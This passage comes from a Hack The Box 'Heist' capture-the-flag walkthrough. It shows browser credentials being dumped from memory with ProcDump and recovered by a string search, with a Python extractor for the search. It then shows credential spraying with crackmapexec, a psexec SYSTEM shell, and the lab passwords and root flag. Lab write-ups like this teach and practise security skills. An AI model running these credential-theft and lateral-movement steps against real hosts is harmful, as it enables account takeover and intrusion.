ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:41] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012241.dmp
[01:22:41] Dump 1 writing: Estimated dump file size is 310 MB.
[01:22:42] Dump 1 complete: 310 MB written in 0.4 seconds
[01:22:42] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6964

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:50] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012250.dmp
[01:22:50] Dump 1 writing: Estimated dump file size is 298 MB.
[01:22:51] Dump 1 complete: 298 MB written in 0.4 seconds
[01:22:51] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop>
Downloading these dumps to your local machine can take time depending on your network speed, but can be done with
*Evil-WinRM* PS C:\users\chase\desktop> gci

    Directory: C:\users\chase\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/29/2021   1:22 AM      541427283 firefox.exe_210729_012200.dmp
-a----        7/29/2021   1:22 AM      299695231 firefox.exe_210729_012220.dmp
-a----        7/29/2021   1:22 AM      358364796 firefox.exe_210729_012232.dmp
-a----        7/29/2021   1:22 AM      317007025 firefox.exe_210729_012241.dmp
-a----        7/29/2021   1:22 AM      304502485 firefox.exe_210729_012250.dmp
-a----        7/29/2021   1:17 AM         401288 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt
Examining the strings in one of the dump files (for me, the one ending in 012220.dmp) and searching only for strings containing "password" gives the administrator's username and password: admin@support.htb : 4dD!5}x/re8]FBuZ
Don't forget to add the username administrator and this password to our user.txt and password.txt lists.
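For the search through the dump itself, here is an added example that is not code from this writeup: the strings-plus-grep step done in Python, with a UTF-16LE pass alongside the ASCII one. Firefox and most Windows programs keep form fields and URLs as UTF-16, so an ASCII-only strings run can walk straight past the very credential you are after. The dump bytes are constructed and the values in them are placeholders, not anything taken from the machine; read_dump applies the same search to a real .dmp file.

```python
"""Recover readable strings from a process memory dump and filter for credentials.

Added example, not code from the writeup. Equivalent to `strings` piped
through `grep -i password`, plus a UTF-16LE pass, which is what makes the
difference on Windows process memory. SAMPLE_DUMP is constructed; its
values are placeholders.
"""
import re


def extract_strings(blob: bytes, min_len: int = 6):
    """Yield (offset, encoding, text) for every run of at least min_len
    printable characters, first the ASCII runs, then the UTF-16LE ones."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_run.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in utf16_run.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def find_credential_strings(blob: bytes, keyword: str = "password", min_len: int = 6):
    """Return the strings mentioning keyword (case-insensitive), sorted by offset."""
    key = keyword.lower()
    return sorted(hit for hit in extract_strings(blob, min_len) if key in hit[2].lower())


def read_dump(path: str, keyword: str = "password"):
    """Run the same search over a real dump file. ProcDump output is hundreds
    of MB, so do this on a machine with the memory to hold it."""
    with open(path, "rb") as fh:
        return find_credential_strings(fh.read(), keyword)


# Constructed sample: a login-form POST body (ASCII) next to a UTF-16LE URL and
# a UTF-16LE field, the way a browser process holds them. Placeholder values only.
SAMPLE_DUMP = (
    b"\x00\x01\x02" * 5
    + b"login_username=EXAMPLE_USER&login_password=EXAMPLE_PASS&login=\x00"
    + b"\xff\xfe" * 4
    + "https://support.example/login.php".encode("utf-16le")
    + b"\x00\x00\x7f\x80"
    + "password=EXAMPLE_UTF16_PASS".encode("utf-16le")
    + b"\x00" * 8
)

if __name__ == "__main__":
    for offset, encoding, text in find_credential_strings(SAMPLE_DUMP):
        print("0x%08x %-8s %s" % (offset, encoding, text))
```

The defensive takeaway is the same one the todo.txt on the desktop hints at: anything typed into a browser on a host where other users can open a WinRM session and run ProcDump is recoverable by those users, so an administrator password has no business being entered on a shared support box.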

We are able to log in to the web page as admin@support.htb, but there is nothing more to find there even after that.
Let us fire up crackmapexec again to validate our discovery (the administrator credentials) against SMB:
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ crackmapexec smb 10.10.10.149 -u user.txt -p password.txt
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\administrator:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
And we have a valid combo: administrator:4dD!5}x/re8]FBuZ
Root Flag
Let's now use Impacket's psexec.py to get a SYSTEM shell:
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@heist.htb
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on heist.htb.....
[*] Found writable share ADMIN$
[*] Uploading file iajwQmKr.exe
[*] Opening SVCManager on heist.htb.....
[*] Creating service PMMu on heist.htb.....
[*] Starting service PMMu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:/users/administrator/desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 78E3-E62D

 Directory of c:\Users\Administrator\Desktop

02/18/2021  04:00 PM    <DIR>          .
02/18/2021  04:00 PM    <DIR>          ..
04/22/2019  09:05 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6,840,758,272 bytes free

c:\Users\Administrator\Desktop>type root.txt
50dfa3c6bfd20e2e0d071b073d766897

c:\Users\Administrator\Desktop>
We finally have both the user and root flags; I hope this box was a good learning experience.